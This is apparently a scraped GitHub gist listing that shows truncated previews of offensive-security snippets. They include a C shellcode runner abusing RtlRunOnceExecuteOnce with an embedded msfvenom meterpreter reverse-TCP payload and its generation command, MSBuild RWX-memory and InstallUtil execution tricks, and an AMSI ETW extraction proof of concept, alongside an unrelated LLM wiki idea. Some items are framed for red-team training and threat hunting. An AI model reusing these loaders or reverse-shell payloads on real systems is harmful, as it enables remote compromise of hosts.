@joe-desimone
joe-desimone / llm-wiki.md
Created April 4, 2026 17:24 — forked from karpathy/llm-wiki.md
llm-wiki

LLM Wiki

A pattern for building personal knowledge bases using LLMs.

This is an idea file; it is designed to be copy-pasted into your own LLM agent (e.g. OpenAI Codex, Claude Code, OpenCode / Pi, etc.). Its goal is to communicate the high-level idea, but your agent will build out the specifics in collaboration with you.

The core idea

Most people's experience with LLMs and documents looks like RAG: you upload a collection of files, the LLM retrieves relevant chunks at query time, and generates an answer. This works, but the LLM is rediscovering knowledge from scratch on every question. There's no accumulation. Ask a subtle question that requires synthesizing five documents, and the LLM has to find and piece together the relevant fragments every time. Nothing is built up. NotebookLM, ChatGPT file uploads, and most RAG systems work this way.

@joe-desimone
joe-desimone / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 6, 2023 14:02 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@joe-desimone
joe-desimone / README.md
Created October 17, 2022 14:17
Table Top With Teeth - Training Exercise

Instructions

The following script is designed to create artifacts that teams can use to hunt new or interesting capabilities.

The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet

This script is self-contained. It should dynamically write a DLL to disk and load it into cscript.exe.

To invoke: cscript.exe stranger_things.js. This example expects a 64-bit system.

@joe-desimone
joe-desimone / gist:f2a3564e74621169540e26499c4588ad
Created September 21, 2022 22:51
MSBuild Property Functions - Load RWX Memory Mapped File
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@joe-desimone
joe-desimone / Snapit.cs
Created August 4, 2022 01:25
Snapit - MMC Installer, things
using Microsoft.ManagementConsole;
using System.ComponentModel;
using System;
using System.Security.Permissions;
using System.Collections;
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /reference:C:\Windows\assembly\GAC_MSIL\microsoft.managementconsole\3.0.0.0__31bf3856ad364e35\microsoft.managementconsole.dll .\Snapit.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe SnapIt.dll
@joe-desimone
joe-desimone / AMSIScriptContentRetrieval.ps1
Created June 7, 2021 00:23 — forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }